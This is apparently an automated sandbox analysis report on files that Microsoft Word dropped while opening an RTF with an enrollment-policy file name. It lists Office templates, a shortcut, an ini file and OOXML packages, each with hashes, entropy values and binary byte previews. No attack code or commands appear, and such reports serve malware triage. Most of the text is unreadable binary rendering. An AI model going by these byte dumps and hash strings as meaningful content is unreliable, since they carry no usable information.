                                                                                      Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31835
                                                                                      Entropy (8bit):7.81952379746457
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                      MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                      SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                      SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                      SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                      Malicious:false
                                                                                      Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31008
                                                                                      Entropy (8bit):7.806058951525675
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                      MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                      SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                      SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                      SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):23597
                                                                                      Entropy (8bit):7.692965575678876
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                      MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                      SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                      SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                      SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):22149
                                                                                      Entropy (8bit):7.659898883631361
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                      MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                      SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                      SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                      SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                      Malicious:false
                                                                                      Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):20554
                                                                                      Entropy (8bit):7.612044504501488
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                      MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                      SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                      SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                      SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                      Malicious:false
                                                                                      Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):21791
                                                                                      Entropy (8bit):7.65837691872985
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                      MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                      SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                      SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                      SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):25314
                                                                                      Entropy (8bit):7.729848360340861
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                      MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                      SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                      SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                      SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                      Malicious:false
                                                                                      Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):30
                                                                                      Entropy (8bit):1.172253928364927
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:zpX:l
                                                                                      MD5:B16041E3A13B68ED05ADB63BC9AB6E89
                                                                                      SHA1:2B2419B9965640D3B02F9FD8A4DF10FA4B6C0CF2
                                                                                      SHA-256:69456A98F8A3ACE08A521D5FF11557EA4F38AFE86C7BB94C125DFB1694CC19AD
                                                                                      SHA-512:1B90F0D5CB3DC525B045163F9328B7874055089EBEDE2A50510A8470EEAB0118462EAF226D110504C2D8C2D6E8C3216D75C86F20A537FB7BBE966712653055BA
                                                                                      Malicious:false
                                                                                      Preview:..............................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:57:14 2024, mtime=Fri Nov 15 16:08:37 2024, atime=Fri Nov 15 16:08:36 2024, length=446504, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):679
                                                                                      Entropy (8bit):4.781563369094586
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:88zmkiuWQGiyyVCTltdjAKT5JzVX2XVCTltJeXVmV:8Mine6BAK9J5A6xeXVm
                                                                                      MD5:8E2BA6548B260FC6CB9A2B5B8081AFC1
                                                                                      SHA1:710CEC012B7BB0FF65DE554DFFB56F9B1B8A3F8B
                                                                                      SHA-256:A92AE5D78186482BA84F7CF1612A416EB7D21157874675E5E39F13D0CBAF9907
                                                                                      SHA-512:4997B1279F65A949A26E2A527FB1DFB05DB26D725407FF773E3E6D711F9D3FD42A459F39D072371CAE8D78C44238FE5FF4D2D86482D5952D011C6D16C198AD44
                                                                                      Malicious:false
                                                                                      Preview:L..................F.... ...;....Y..s5...7..!....7..(...........................2.(...oY.. .IAMGOL~1.RTF.........GX(woY.............................s..I.a.m.g.o.l.d.-.P.Y.M.P.A.T.A. .P.o.l.i.c.y._.E.n.r.o.l.l.m.e.n.t.2.0.2.4.7.3.9.4.4.1...r.t.f.......t...............-.......s............F.......C:\Users\user\Desktop\Iamgold-PYMPATA Policy_Enrollment2024739441.rtf..F.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.a.m.g.o.l.d.-.P.Y.M.P.A.T.A. .P.o.l.i.c.y._.E.n.r.o.l.l.m.e.n.t.2.0.2.4.7.3.9.4.4.1...r.t.f.`.......X.......760639...........hT..CrF.f4... .w.............%..hT..CrF.f4... .w.............%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Generic INItialization configuration [folders]
                                                                                      Category:dropped
                                                                                      Size (bytes):147
                                                                                      Entropy (8bit):4.935754860938678
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HIwovl/KJUAJ1XLxVXRGrlm45KJUAJ1XLxVXRGrlv:HUMJUAJzVXcrKJUAJzVXcr1
                                                                                      MD5:B2C6591E6F420C51E68AA2FCE6FB2A34
                                                                                      SHA1:DDE20A70CB92738F73726D814D7006117E0A7624
                                                                                      SHA-256:029502BA38285F2576731D729FF8D83676042BEB76AFCEB0F5D993FD8EAAAF33
                                                                                      SHA-512:C815C995850A40DD1B6B7AF65CD45D540B5614C6428BFFE46DC0ABFA926187091866223C26FAD1C713CBE61DB03E0E8BDC3D03C49344FAA8237CF1DAA8ABB177
                                                                                      Malicious:false
                                                                                      Preview:[misc??????????????????????????]..Iamgold-PYMPATA Policy_Enrollment2024739441.LNK=0..[folders]..Iamgold-PYMPATA Policy_Enrollment2024739441.LNK=0..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):562113
                                                                                      Entropy (8bit):7.67409707491542
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                      MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                      SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                      SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                      SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1649585
                                                                                      Entropy (8bit):7.875240099125746
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                      MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                      SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                      SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                      SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):558035
                                                                                      Entropy (8bit):7.696653383430889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                      MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                      SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                      SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                      SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):570901
                                                                                      Entropy (8bit):7.674434888248144
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                      MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                      SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                      SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                      SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):523048
                                                                                      Entropy (8bit):7.715248170753013
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                      MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                      SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
